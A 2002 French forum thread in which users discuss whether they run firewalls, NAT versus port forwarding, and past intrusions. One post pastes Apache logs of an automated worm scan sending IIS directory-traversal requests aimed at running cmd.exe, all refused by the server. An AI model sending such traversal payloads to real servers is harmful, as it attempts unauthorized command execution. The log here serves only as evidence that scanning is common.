Sondage : Le firewall et vous...

Sondage : Le firewall et vous... - Logiciels - Windows & Software

Marsh Posté le 27-11-2002 à 07:17:06    

Voila jespere ke mon petit sondage permetra de voir ce ke pense les internautes au sujets des firewall.


Message édité par erad le 27-11-2002 à 07:17:39
Reply

Marsh Posté le 27-11-2002 à 07:17:06   

Reply

Marsh Posté le 27-11-2002 à 07:18:26    

Erad a écrit a écrit :

Voila jespere ke mon petit sondage permetra de voir ce ke pense les internautes au sujets des firewall.




 
 :D  
 
Quelle ambition !


---------------
Ratures - Cuisine
Reply

Marsh Posté le 27-11-2002 à 07:19:11    

c juste un sondage rigolo  :D

Reply

Marsh Posté le 28-11-2002 à 08:15:52    

:ouch:

Reply

Marsh Posté le 28-11-2002 à 09:00:58    

moi j'ai juste un Anti-virus, PLUS de firewall...
a part foutre la merde dans mon LAN ca servait pas a grand chose..
 
enfin si ca peut servir mais dans l'autre sens je pense, c a d pour empecher les prog installé et les spyware d'acceder au net..

Reply

Marsh Posté le 28-11-2002 à 09:07:12    

De toute façon, un particulier n'a rien à craindre des vilains hackerz, surtout s'il est en RTC.
 
Mes logs d'Apache hier soir :
 


213.1XX.XX.XX - - [27/Nov/2002:21:30:02 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:03 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:04 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:08 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:09 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:22 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:26 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:31 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:32 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:33 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:35 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:36 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:40 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:41 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"
213.1XX.XX.XX - - [27/Nov/2002:21:30:42 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 60 "-" "-"

 
 
:sarcastic:

Reply

Marsh Posté le 28-11-2002 à 09:12:22    

Je suis connecté à l'adsl, on me scan au moin 10 fois par jours, si je met un ftp anononyme il est rempli de divx en allemand en 2 jour, le firewall ne corrige pas le probleme (puisque je laisse ouvert le port ftp pour mes amis). Mais bon, j'en met quand meme un ne serait ce que pour savoir le faire...

Reply

Marsh Posté le 28-11-2002 à 09:14:45    

Snipe Foo a écrit a écrit :

Je suis connecté à l'adsl, on me scan au moin 10 fois par jours, si je met un ftp anononyme il est rempli de divx en allemand en 2 jour, le firewall ne corrige pas le probleme (puisque je laisse ouvert le port ftp pour mes amis). Mais bon, j'en met quand meme un ne serait ce que pour savoir le faire...




 
Si tu permets les connexions en anonyme sur ton FTP, c'est pas étonnant :D

Reply

Marsh Posté le 28-11-2002 à 09:18:09    

firewall => rab.


---------------
Le topic du QLRR et FIRE - Knowledge is power. Power corrupts. Study hard, become evil.
Reply

Marsh Posté le 28-11-2002 à 09:44:33    

perso, j'en ai un parce que de toute façon, le module est déjà chargé pour le partage de connexion (iptable)


---------------
Celui qui pose une question est idiot 5 minutes. Celui qui n'en pose pas le reste toute sa vie. |  Membre du grand complot pharmaceutico-médico-scientifico-judéo-maçonnique.
Reply

Marsh Posté le 28-11-2002 à 09:44:33   

Reply

Marsh Posté le 28-11-2002 à 09:47:09    

moi j'en ai un... je suis en ADSL IP dynamique et manque de bol sur ma becane g pas mal d'appli server rediger par no-ip... je me suis dejà fait hacker mon serveur de mail! et j'ai failli être touche par un vers qui attaque IIS (je sais plus le nom) ... sans mon firewall sans était fini de mon DD et de mes data!!!!


Message édité par papangue le 28-11-2002 à 09:47:44
Reply

Marsh Posté le 28-11-2002 à 10:00:48    

J'en utilise un depuis que G l'ADSL.
La première semaine C super chiant parce que C alerte sur alerte, le temps de déclarer tous les progs.
Je suis pas persuadé de l'utilité mais bon comme ca me gêne pas, je garde.
Ca évitera pas de se faire hacker mais le log donne pas mal de renseignement sur les entrées/sorties.
Et puis surtout, ca évite à Windows d'être trop bavard sur le net.

Reply

Marsh Posté le 28-11-2002 à 10:02:05    

Mjules a écrit a écrit :

perso, j'en ai un parce que de toute façon, le module est déjà chargé pour le partage de connexion (iptable)




 
entre un firewall installé et un firewall configuré ya un grand gouffre

Reply

Marsh Posté le 28-11-2002 à 10:08:35    

je vois pas en koi un firewall empeche un vers IIS de detruire tes data???

Reply

Marsh Posté le 28-11-2002 à 10:13:40    

com21 a écrit a écrit :

 
entre un firewall installé et un firewall configuré ya un grand gouffre




 :jap: C'est clair, et il faut aussi différencier firewall en entrée sur la paserelle du réseau (Firewall one par exemple) et firewall sur poste de travail qui bloque aussi les acces de chaque appli du poste.
 

cmotsch a écrit a écrit :

 
Si tu permets les connexions en anonyme sur ton FTP, c'est pas étonnant :D




C'est pas étonnant, mais c'est pour illustrer le fait que les scans de machines sont réguliers ;)

Reply

Marsh Posté le 28-11-2002 à 10:21:23    

Suis derrière routeur donc... NAT

Reply

Marsh Posté le 28-11-2002 à 10:29:19    

routeur ADSL, filtrage de paquetsvenant du WAN, juste 1 port reconfigure pour le SUA...

Reply

Marsh Posté le 28-11-2002 à 11:11:09    

Thalis a écrit a écrit :

Suis derrière routeur donc... NAT




 
 
quelqu'un peut m'expliquer ce "NAT" ??
J'ai un routeur aussi et je voudrais comprendre.C'est une sorte de firewall ?


---------------
The NeXt Vortex => www.nextvortex.net
Reply

Marsh Posté le 28-11-2002 à 11:29:16    

Non, en fait c de la redirection de ports (Network Adress Translation): cad par ex si qq'un envoie une requete sur le port 21, et que tu as redirigé le port 21 sur ton ordinateur, ben il recevra la requete sinon celle ci se perd ds le vide...

Reply

Marsh Posté le 28-11-2002 à 11:30:53    

NAT, c de la Translation d'Adresse. ça sert à partager une ip publique pour plusieurs PCs en LAN.
 
or, par défaut, un routeur NAT ne route pas les connexions entrantes ... ça fait donc office qqe part de firewall
 
sinon, pour répondre au post, j'utilise un fw logiciel pour 2 raisons :
1. avec toutes les applis qu'on a, il est illusoire de croire qu'on maîtrise son pc sans firewall
2. et puis au passage, je n'ai pas envie que ma connexion adsl soit utilisée par des hackerz pour faire des Deny Of Service sur des sites ou des routeurs pros ...


---------------
le progrès ne vaut que s'il est partagé par tous
Reply

Marsh Posté le 28-11-2002 à 11:37:21    

merci les gars.


---------------
The NeXt Vortex => www.nextvortex.net
Reply

Marsh Posté le 28-11-2002 à 11:45:54    

ce que thalis explik la c'est le PAT

Reply

Marsh Posté le 28-11-2002 à 11:50:23    

aske c la mode :D

Reply

Marsh Posté le 28-11-2002 à 11:55:10    

trictrac a écrit a écrit :

ce que thalis explik la c'est le PAT




 :heink:

Reply

Marsh Posté le 28-11-2002 à 12:02:31    

et ui.. PAT : port adress translation, ca ressemble pas mal a ce que tu explik a mon gout

Reply

Marsh Posté le 28-11-2002 à 12:09:18    

trictrac a écrit a écrit :

et ui.. PAT : port adress translation, ca ressemble pas mal a ce que tu explik a mon gout




 
euh oui, enfin bon c le principe du NAT qd meme hein... et ds le nat t'as la redirection des ports aussi

Reply

Marsh Posté le 28-11-2002 à 12:14:05    

trictrac a écrit a écrit :

je vois pas en koi un firewall empeche un vers IIS de detruire tes data???




c simple le worm utilisait une faille de IIS pour commencer son installation mais avait besoin d'aller chercher d'autre source (pour compléter son install) et pour ca il utilisait un port spécifique qui était bien entendu bloqué :)

Reply

Marsh Posté le 28-11-2002 à 12:20:51    

tu as de la chance, parce qu'il y a des failles qui foutent la merde avec seulement le port 80... et la le firewall il peut rien faire.
Sans compter le probleme des liens avec la commande win-update ou je sais pas koi qui supprime un dossier de ton dur. Ben la ton firewall il peut rien faire.. donc ne pas trop miser sur un firewall.
pris de misc: c'est comme si tu dis que tu peut pas aller en prison parce que tu a tuer qqun sur la route, rien que parce que tu es assuré... l'assurance c'est utile, mais il faut rester vigilant quand meme a coté

Reply

Marsh Posté le 28-11-2002 à 12:23:06    

firewall sur client derriere le firewall de la passerelle nunux.
 
L'un pr eviter que des prog à la con sur le client accede au net,
et  l'autre pr vraiment bloquer le trafic ....
 
Perso, j'ai bien entendu un lan, donc du netbios, et des dd partages, ça me ferait bien chier que qqn puissent les consulter, modifier & co...
 
Depuis 6 ans pratiquement que j'ai le net, tjrs utilise un firewall (sauf la 1ere année  [:twixy] ), me suis jamais fait "hacker" :)
 
Ce qui est marrant c ce ki disent me suis jamais fait hacker & g pas de fw....bah les scripts kiddies qui "piratent" les particuliers ne vont pas forcement s'amuser à te faire coucou... [:spamafote]  
Genre apres, c plus pratique, tu te sers par ex. d'une machine d'un pov gugus sans fw pr attaquer un vrai serveur important...c tres pratique ..  
 
(vecu inside  [:twixy] ).

Reply

Marsh Posté le 28-11-2002 à 12:30:59    

trictrac a écrit a écrit :

tu as de la chance, parce qu'il y a des failles qui foutent la merde avec seulement le port 80... et la le firewall il peut rien faire.
Sans compter le probleme des liens avec la commande win-update ou je sais pas koi qui supprime un dossier de ton dur. Ben la ton firewall il peut rien faire.. donc ne pas trop miser sur un firewall.
pris de misc: c'est comme si tu dis que tu peut pas aller en prison parce que tu a tuer qqun sur la route, rien que parce que tu es assuré... l'assurance c'est utile, mais il faut rester vigilant quand meme a coté




je suis d'accoird avec toi c'est pourquoi lorsque tu as des appli serveur d'installer il faut surveiller leur activité.... mais tu ne t'ai jamais fait taggé ton DD?? moi si.... ya même un gus qui m'a supprimé mes fichier de boot et système parce que j'avais pas étais poli sur IRC.... ca m'apprendra de na pas faire attention mais en tout cas maintenant le firewall est de rigueur.... un sur la passerelle qui filtre le traffic et un sur chaque client qui autorise les appli a aller ou non sur le net!

Reply

Marsh Posté le 28-11-2002 à 19:09:36    

:hello:

Reply

Marsh Posté le 28-11-2002 à 19:29:48    

moi une petite linux box bien blindee
 
avec  ca, aucun problemes

Reply

Marsh Posté le 28-11-2002 à 20:02:57    

cmotsch a écrit a écrit :

 
 
Si tu permets les connexions en anonyme sur ton FTP, c'est pas étonnant :D




 
Tu peut mettre un FTP anonyme mais sans les droits en écriture !!!!

Reply

Marsh Posté le 28-11-2002 à 20:09:13    

symantec a écrit a écrit :

 
 
Tu peut mettre un FTP anonyme mais sans les droits en écriture !!!!




 
Tout à fait  :jap:  
 
Mais apparemment c'était pas son cas.

Reply

Marsh Posté le 28-11-2002 à 20:33:18    

Thalis a écrit a écrit :

 
 
euh oui, enfin bon c le principe du NAT qd meme hein... et ds le nat t'as la redirection des ports aussi




 
Non pas du tout, le NAT c'est pour "partager la connexion", la redirection de port c'est du PAT. On confond souvent les 2 car en général les softs de partage de connexion incluent le NAT et le PAT donc o final on fait plus la différence et puisque la fn première est de partager la connexion, on dit NAT et pas PAT, mais o final tu as les 2.

Reply

Marsh Posté le 28-11-2002 à 21:31:02    

cmotsch a écrit a écrit :

 
[...]
Mais apparemment c'était pas son cas.




 
Evidement, il s'agissait d'un test que je voulais faire (et j'irais meme jusqu'a avouer que j'esperais que des gens dépose de trucs interessant :whistle: ).
 
Un firewall bloque des ports, mais aussi permet de les ouvrir pour certaines adresses IP (qui ne reve pas de lancer ses downloads sur sa machine chez lui depuis le boulot via ssh/tsc/dameware/vnc etc...)
 
Comme il est dit plus haut, a partir du moment ou un port est ouvert par le firewall, ce dernier ne controle plus la cituation, apres il faut patcher les failles connues sur le service qui tourne sur le port en question (et s'il s'agit d'un service microsoft, prier pour que le patch existe ;) )

Reply

Marsh Posté le 28-11-2002 à 21:36:22    

un firewall c loin de tout bloker de toute facon

Reply

Marsh Posté le 29-11-2002 à 00:20:59    

en tout cas sur certains progs c la merde...

Reply

Marsh Posté le 29-11-2002 à 13:59:38    

Clockover a écrit a écrit :

un firewall c loin de tout bloker de toute facon




 
oui mais ca doit limiter deja pas mal

Reply

Marsh Posté le 29-11-2002 à 14:53:00    

avant d'avoir mon routeur adsl avec firewall intégré, j'avais une 10 aine d'attaque jour, qd je l'ai mis, plus rien, et la j'ai plus de firewall soft sur mes pc (peut etre a tord ?)

Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed